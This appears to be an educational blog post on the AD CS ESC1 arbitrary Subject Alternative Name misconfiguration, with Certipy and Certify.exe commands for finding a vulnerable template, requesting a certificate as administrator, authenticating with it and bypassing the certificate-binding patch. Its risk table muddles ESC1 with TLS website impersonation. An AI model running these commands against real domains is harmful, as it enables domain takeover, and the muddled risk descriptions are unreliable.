What is the Subject Alternative Name (SAN)?

Arbitrary Subject Alternative Name (SAN) vulnerability is a security concern related to the X.509 certificate standard used in the Transport Layer Security (TLS) protocol.

The Subject Alternative Name field in a certificate allows multiple hostnames to be associated with a single public key.

This is particularly useful in scenarios where a server may have multiple domain names or subdomains.

AD CS ESC1 – Security Risks

Active Directory Certificate Services (AD CS) is crucial for providing public key infrastructure (PKI) functionalities, but it harbors security risks.

Significant among these is the escalation of privileges through misconfigurations, allowing attackers to issue fraudulent certificates or impersonate users.

Additionally, the complexity and maintenance requirements of AD CS make it vulnerable to emerging threats if not properly monitored and updated.

Security RiskDescription
Man-in-the-Middle AttacksAttackers can exploit the vulnerability to intercept and modify communication between users and the affected server, compromising the confidentiality and integrity of the transmitted data.
Phishing AttacksMalicious actors may use a certificate with an arbitrary SAN to impersonate a legitimate website, tricking users into providing sensitive information, leading to potential data breaches or fraud.
Domain HijackingBy manipulating the SAN field, attackers might attempt to take control of a domain or subdomain associated with the certificate, posing a threat to the availability and integrity of online services.
Unauthorized AccessAn exploited SAN vulnerability can potentially lead to unauthorized access to sensitive systems or information, compromising the overall security posture of the affected network or infrastructure.

ESC1 Requirements

Manual approvals disable
Authorization signatures
Enrollment Rights

List of necessary EKUs

Client Authentication1.
PKINIT Client Authentication1.
Smart Card Logon1.
Any Purpose2.

Attacking Arbitrary Subject Alternative Name- ESC1

1. Find a Valid Template

certipy find -u [email protected] -p Passw0rd -dc-ip
image 1
ESC1 - Understand the Arbitrary Subject Alternative Name Vulnerability 5

2. Request Certificate as Administrator

certipy req -username [email protected] -password Passw0rd -ca corp-DC-CA -target ca.ad-attacks.local -template User -upn administrator@ad-attacks.local -dns dc.ad-attacks.local

3. Connect using the new Administrator Certificate

certipy auth -pfx Administrator.pfx -dc-ip

CBA Patch

Certify.exe request /ca:cbp-dc.protectedcb.corp\CBP-CA /template:ProtectedUserAccess /altname:administrator
/sidextension:S-1-5-21-1286082170-882298176-404569034-500 /domain:protectedcb.corp


The Arbitrary SAN Vulnerability poses a substantial risk to encrypted communications, potentially allowing attackers to bypass encryption safeguards.

By understanding, detecting, and preventing this vulnerability, organizations can better protect their data integrity and confidentiality in the face of evolving cyber threats.

ADCS Certified Enterprise Security Professional

Avatar of RFS

RFS (36)

Offshore NetworkTrain on real enterprise infrastructures with Hack The Box.

Offshore is a real-world enterprise environment that features a wide range of modern Active Directory flaws and misconfigurations.